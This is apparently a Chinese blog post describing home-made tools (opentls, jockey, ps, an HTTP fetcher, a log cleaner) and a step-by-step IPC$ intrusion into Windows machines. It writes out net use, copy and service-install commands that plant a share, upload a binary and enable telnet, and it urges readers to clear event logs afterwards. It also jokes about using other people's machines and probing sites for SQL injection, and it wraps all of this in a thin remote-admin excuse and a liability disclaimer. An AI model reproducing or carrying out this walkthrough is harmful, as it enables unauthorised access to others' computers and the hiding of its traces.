好早以前的事了,利用IPC$入侵.顺便写一些小工具

类别:编程语言 点击:0 评论:0 推荐:

opentls,修改Telnet的NTLM设置,这样就可以远程登录了
jockey,服务管理,主要是提供服务的一般操作,如添加,删除等等功能.
ps  ,进程管理,列出所有的进程,也可以杀掉进程
http,http操作的工具,get以及Header
eventlog,日志操作清除工具
warder,扫描工具,如果忘记密码,可以用这个找回来的,//TODO

这是一些IPC$ 安全工具,给那些远程安装防火墙的糊涂程序员用的.
虽然IPC已经很远的事了,但我是刚刚才知道有IPC$入侵的事情,初学开发嘛.呵呵.


cherub是协助管理工具,之所以要写这个工具是因为我有一次远程安装了防火墙,无奈之下,只好写个工具来干掉防火墙了.

至于扫描密码嘛.呵呵.大家自己去找吧,我现在还没有提供.

基本的思路:

首先目标机器要开户IPC$(本来不想用IPC$的,但WMI SDK 没有耐心下载),一般用扫描工具先得到管理员的密码,而且用telnet登录.所以说,如果能扫描到管理员的密码,呵呵.你已经是一个高手了,基本上不用这个工具的.

Window的telnet服务的默认认证方式是NTLM认证的.所以需要上传一个工具来修改.

于是,应该在对方的机器上开一个共享把文件复制上去,然后再启动这个程序.
因为有些机器只开了IPC$共享,并没有打开文件夹共享,但可以访问到服务管理的,所以....
嘿嘿.只要添加一个命令为"net use share admin=c:\winnt"的服务再运行就可以搞定了(虽然会提示1503的错误,但没有事).因为这个命令已经运行了.
BTW:记得要清除这些日志哦.服务启动错误也会记录的.

这样就可以把opentls上传到目标机器了.当然是用copy了.如果你有其他方法也行.

然后用jockey来添加一个服务,启动,删除.

OK.再用jockey启动telnet服务.
这样就可以用telnet登录了.
然后可以用http工具下载文件(或....测试一些网站的SQL注入... :D ),ps来管理进程(除了system杀不掉,基本上都可以杀掉),log来清除日志

我把基本的方法列出来了.大家好运.


声明一下,如果因为本软件引起的所有相关责任,一概与本软件以及作者无关,我只是希望我下次再遇到远程机器安装防火墙并把密码忘记了而且又不想去坐在机房里的时候,可以轻松的维护.出差是很一件很痛苦的事.

增加共享:
jockey \\127.0.0.1 "user" "pwd" /install:"net" /param:"share" /param:"testdir=C:\winnt" /auto
先连到对方的机器
net use \\127.0.0.1 "pwd" /user:"user"
把opentls.exe复制到目标机
copy opentls.exe \\127.0.0.1\testdir
删除刚才建立的共享目录
jockey \\127.0.0.1 "user" "pwd" /install:"net" /param:"share" /param:"testdir" /param:"/d" /auto

启动opentls
jockey \\127.0.0.1 "user" "pwd" /install:"opentls" /auto
启动telnet
jockey \\127.0.0.1 "user" "pwd" /service:"tlntsvr" /start

telnet 127.0.0.1

具体的使用方法请见各程序的帮助.

虽然有些朋友提醒我,如果扫描到密码了,就可以直接用计算机管理->连接远程计算机的方式进行管理.
但我经常是喜欢用telnet->telnet的方式.所以如果在目标机器上想再连第三台机器时,就显得力不从心了.而且用命令行也比较方便.
有些人喜欢用别人的机器.有些人喜欢用代理.我还是喜欢用别人的机器,因为我的上网速度太慢了.-_-#
另外,jockey很好用.特别是可以删除一些错误的service,ps可以干掉apache启动的错误cgi进程(win2000动不动就告诉我:"无法完成操作,拒绝访问",真是很郁闷),http可以得到http头.这些工具对程序员来说还是很方便的. :P
下载的地址去我的个人网站上找:http://unixgod.zj.com


UP.发呆的上帝

本文地址:http://com.8s8s.com/it/it24681.htm